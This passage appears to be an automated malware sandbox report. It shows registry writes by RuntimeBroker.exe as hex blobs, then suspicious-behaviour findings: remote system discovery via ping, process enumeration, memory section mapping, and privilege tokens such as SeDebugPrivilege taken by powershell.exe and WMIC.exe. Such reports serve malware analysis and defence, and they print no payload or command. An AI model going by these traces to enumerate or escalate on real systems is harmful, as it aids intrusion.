726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c39613133393430636232336633396539663037653961326638363464623466643364343434366433613764613563633937323363616138653763323866636235000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000069796d756779686c000000000000000080c72b02b50e1340bd556b93270e57f29ca1b509e929ed11a0ee7a46ce8ece4880c72b02b50e1340bd556b93270e57f29ca1b509e929ed11a0ee7a46ce8ece48ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900320039003600360032003400320030002d0031003000350034003200330038003200380039002d0032003900360031003100390034003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000045e03923000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\aa8797ef-e17a-4e70-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1f5f7ee6-9107-4f4d- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000006cbb59251dcfd8016cbb59251dcfd8016cbb59251dcfd801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000003755b93a2000633437383561343064353239653738333165376430396433376661373433356539363335383761353865626334613534353265333433323439313664303239630000b20009000400efbe3755b93a3755b93a2e00000000000000000000000000000000000000000000000000943f4b00630034003700380035006100340030006400350032003900650037003800330031006500370064003000390064003300370066006100370034003300350065003900360033003500380037006100350038006500620063003400610035003400350032006500330034003300320034003900310036006400300032003900630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000089b5c04a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63343738356134306435323965373833316537643039643337666137343335653936333538376135386562633461353435326533343332343931366430323963000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000069796d756779686c000000000000000080c72b02b50e1340bd556b93270e57f29aa1b509e929ed11a0ee7a46ce8ece4880c72b02b50e1340bd556b93270e57f29aa1b509e929ed11a0ee7a46ce8ece48ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900320039003600360032003400320030002d0031003000350034003200330038003200380039002d0032003900360031003100390034003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000045e03923000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\aa8797ef-e17a-4e70- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000006f273251dcfd80106f273251dcfd80106f273251dcfd801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000003755b93a2000613734643430653538636339313532343662333731363534333563636430636261656539663237666136666565636230633236643330656163646233353530390000b20009000400efbe3755b93a3755b93a2e00000000000000000000000000000000000000000000000000fa083100610037003400640034003000650035003800630063003900310035003200340036006200330037003100360035003400330035006300630064003000630062006100650065003900660032003700660061003600660065006500630062003000630032003600640033003000650061006300640062003300350035003000390000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000089b5c04a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61373464343065353863633931353234366233373136353433356363643063626165653966323766613666656563623063323664333065616364623335353039000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000069796d756779686c000000000000000080c72b02b50e1340bd556b93270e57f29da1b509e929ed11a0ee7a46ce8ece4880c72b02b50e1340bd556b93270e57f29da1b509e929ed11a0ee7a46ce8ece48ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900320039003600360032003400320030002d0031003000350034003200330038003200380039002d0032003900360031003100390034003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000045e03923000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6ce58824-7d14-4530- = "\\\\?\\Volume{2339E045-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\2f9b07b141cc14c0a34ba3c8d12c9b2629d713791c1315310cb401583f50d906"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14f53c63-b67b-4f94- = 3f90ff261dcfd801	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\aa8797ef-e17a-4e70- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\18471c9e-3897-482d- = "0"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fadf46d9-7734-4029-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e54555e2-a2a1-48cd- = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e54555e2-a2a1-48cd- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fcdd60251dcfd801fcdd60251dcfd801fcdd60251dcfd801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000003755b93a2000386134363862303866353763326163616665633865326335643036613565316635383166343962373037353462346237356631386163353133346265343939310000b20009000400efbe3755b93a3755b93a2e00000000000000000000000000000000000000000000000000041d4400380061003400360038006200300038006600350037006300320061006300610066006500630038006500320063003500640030003600610035006500310066003500380031006600340039006200370030003700350034006200340062003700350066003100380061006300350031003300340062006500340039003900310000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000089b5c04a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38613436386230386635376332616361666563386532633564303661356531663538316634396237303735346234623735663138616335313334626534393931000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000069796d756779686c000000000000000080c72b02b50e1340bd556b93270e57f29ba1b509e929ed11a0ee7a46ce8ece4880c72b02b50e1340bd556b93270e57f29ba1b509e929ed11a0ee7a46ce8ece48ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900320039003600360032003400320030002d0031003000350034003200330038003200380039002d0032003900360031003100390034003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000045e03923000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\18471c9e-3897-482d-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\18471c9e-3897-482d- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000064e84c261dcfd801325d62261dcfd801325d62261dcfd8014b5e0d000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000003755b93a2000396131333934306362323366333965396630376539613266383634646234666433643434343664336137646135636339373233636161386537633238666362350000b20009000400efbe3755b93a3755b93a2e000000000000000000000000000000000000000000000000000c943a00390061003100330039003400300063006200320033006600330039006500390066003000370065003900610032006600380036003400640062003400660064003300640034003400340036006400330061003700640061003500630063003900370032003300630061006100380065003700630032003800660063006200350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000089b5c04a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c39613133393430636232336633396539663037653961326638363464623466643364343434366433613764613563633937323363616138653763323866636235000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000069796d756779686c000000000000000080c72b02b50e1340bd556b93270e57f2a6a1b509e929ed11a0ee7a46ce8ece4880c72b02b50e1340bd556b93270e57f2a6a1b509e929ed11a0ee7a46ce8ece48ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900320039003600360032003400320030002d0031003000350034003200330038003200380039002d0032003900360031003100390034003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000045e03923000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e54555e2-a2a1-48cd- = e52a6a251dcfd801	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e54555e2-a2a1-48cd- = "\\\\?\\Volume{2339E045-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\8a468b08f57c2acafec8e2c5d06a5e1f581f49b70754b4b75f18ac5134be4991"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\89d69bfd-87ec-41b4- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e3315572-42d5-4142- = 3bfc65271dcfd801	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e54555e2-a2a1-48cd-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cfe9323-3cfc-41cd- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cfe9323-3cfc-41cd- = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ca425c68-f934-4f95-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f3eea6c0-4692-4111- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e3315572-42d5-4142- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002fc6e8251dcfd80125a22a271dcfd80125a22a271dcfd8015f9019000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000003755b93a2000326639623037623134316363313463306133346261336338643132633962323632396437313337393163313331353331306362343031353833663530643930360000b20009000400efbe3755b93a3755b93a2e000000000000000000000000000000000000000000000000003fbd2200320066003900620030003700620031003400310063006300310034006300300061003300340062006100330063003800640031003200630039006200320036003200390064003700310033003700390031006300310033003100350033003100300063006200340030003100350038003300660035003000640039003000360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000089b5c04a1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32663962303762313431636331346330613334626133633864313263396232363239643731333739316331333135333130636234303135383366353064393036000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000069796d756779686c000000000000000080c72b02b50e1340bd556b93270e57f2a7a1b509e929ed11a0ee7a46ce8ece4880c72b02b50e1340bd556b93270e57f2a7a1b509e929ed11a0ee7a46ce8ece48ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900320039003600360032003400320030002d0031003000350034003200330038003200380039002d0032003900360031003100390034003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000045e03923000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8cfe9323-3cfc-41cd- = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e3315572-42d5-4142-	RuntimeBroker.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
4900	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid	Process
4900	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

4e.exepowershell.exeExplorer.EXE

pid	Process
3012	4e.exe
3012	4e.exe
2256	powershell.exe
2256	powershell.exe
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid	Process
2440	Explorer.EXE

Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid	Process
2256	powershell.exe
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
2440	Explorer.EXE
3368	cmd.exe
2440	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 51 IoCs

Processes:

powershell.exeExplorer.EXERuntimeBroker.exeWMIC.exetasklist.exe

description	pid	Process
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeShutdownPrivilege	2440	Explorer.EXE
Token: SeCreatePagefilePrivilege	2440	Explorer.EXE
Token: SeShutdownPrivilege	3456	RuntimeBroker.exe
Token: SeIncreaseQuotaPrivilege	4080	WMIC.exe
Token: SeSecurityPrivilege	4080	WMIC.exe
Token: SeTakeOwnershipPrivilege	4080	WMIC.exe
Token: SeLoadDriverPrivilege	4080	WMIC.exe
Token: SeSystemProfilePrivilege	4080	WMIC.exe
Token: SeSystemtimePrivilege	4080	WMIC.exe
Token: SeProfSingleProcessPrivilege	4080	WMIC.exe
Token: SeIncBasePriorityPrivilege	4080	WMIC.exe
Token: SeCreatePagefilePrivilege	4080	WMIC.exe
Token: SeBackupPrivilege	4080	WMIC.exe
Token: SeRestorePrivilege	4080	WMIC.exe
Token: SeShutdownPrivilege	4080	WMIC.exe
Token: SeDebugPrivilege	4080	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4080	WMIC.exe
Token: SeRemoteShutdownPrivilege	4080	WMIC.exe
Token: SeUndockPrivilege	4080	WMIC.exe
Token: SeManageVolumePrivilege	4080	WMIC.exe
Token: 33	4080	WMIC.exe
Token: 34	4080	WMIC.exe
Token: 35	4080	WMIC.exe
Token: 36	4080	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4080	WMIC.exe
Token: SeSecurityPrivilege	4080	WMIC.exe
Token: SeTakeOwnershipPrivilege	4080	WMIC.exe
Token: SeLoadDriverPrivilege	4080	WMIC.exe
Token: SeSystemProfilePrivilege	4080	WMIC.exe
